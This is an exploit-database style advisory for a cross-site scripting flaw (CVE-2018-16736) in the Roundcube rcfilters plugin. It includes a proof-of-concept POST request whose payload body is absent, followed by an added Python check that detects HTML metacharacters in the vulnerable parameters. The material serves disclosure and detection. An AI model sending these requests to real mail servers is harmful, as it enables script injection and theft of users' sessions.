Roundcube rcfilters plugin 2.1.6 Cross-Site Scripting Vulnerability / Exploit
Exploits / Vulnerability Discovered : 2018-09-19
Type : webapps
Platform : linux
This exploit / vulnerability (Roundcube rcfilters plugin 2.1.6 cross-site scripting) is for educational purposes only; if you use it, you do so at your own risk!
# Exploit Title: Roundcube rcfilters plugin 2.1.6 - Cross-Site Scripting
# Date: 2018-09-09
# Exploit Author: Fahimeh Rezaei
# Vendor Homepage:
# Software Link:
# Version: rcfilters plugin v2.1.6
# Tested on: Roundcube version 1.0.5
# CVE : CVE-2018-16736
# Details:
# In the rcfilters plugin 2.1.6 for Roundcube, XSS exists via the
# _whatfilter and _messages parameters (in the Filters section of the settings).
# PoC
POST /rc/?_task=settings&_action=plugin.filters-save HTTP/1.1
Host: Target
User-Agent: Mozilla/5.0
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 119
Referer: https://Target/rc/?_action=plugin.filters&_task=settings
Cookie: roundcube_sessid=; roundcube_sessauth=
Connection: close
Upgrade-Insecure-Requests: 1
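
A defender-side check for the request shown in the PoC, as an added example that is not part of the original advisory: it flags POST bodies sent to the plugin.filters-save action whose _whatfilter or _messages values carry HTML metacharacters, including double-encoded ones. The function names and sample requests are constructed for illustration, and the rule assumes legitimate values for these two fields are plain tokens.

```python
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Parameters the advisory names as the XSS inputs.
WATCHED_PARAMS = ("_whatfilter", "_messages")
# Assumption: legitimate values for these fields never contain these characters.
HTML_META = set("<>\"'`")


def is_filters_save(request_target):
    """True when the target is the rcfilters save action used in the PoC."""
    query = parse_qs(urlsplit(request_target).query)
    return (query.get("_task") == ["settings"]
            and query.get("_action") == ["plugin.filters-save"])


def suspicious_params(request_target, body):
    """Return {param: [values]} for watched params carrying HTML metacharacters."""
    if not is_filters_save(request_target):
        return {}
    form = parse_qs(body, keep_blank_values=True)  # percent-decodes once
    hits = {}
    for name in WATCHED_PARAMS:
        # Decode a second time as well so double-encoded markup is not missed.
        bad = [v for v in form.get(name, [])
               if HTML_META & set(v) or HTML_META & set(unquote_plus(v))]
        if bad:
            hits[name] = bad
    return hits


# Constructed sample requests (request target, form body); not captured traffic.
SAVE = "/rc/?_task=settings&_action=plugin.filters-save"
SAMPLES = [
    (SAVE, "_whatfilter=from&_messages=all"),
    (SAVE, "_whatfilter=%3Cb%3Ex%3C%2Fb%3E&_messages=all"),
    (SAVE, "_whatfilter=from&_messages=%253Ci%253E"),
    ("/rc/?_task=mail&_action=list", "_whatfilter=%3Cb%3E"),
]

if __name__ == "__main__":
    for target, body in SAMPLES:
        print(target, body, "->", suspicious_params(target, body) or "clean")
```

The same test can run over proxy or WAF logs that record request bodies; a hit on this endpoint is a reason to check which rcfilters version is installed.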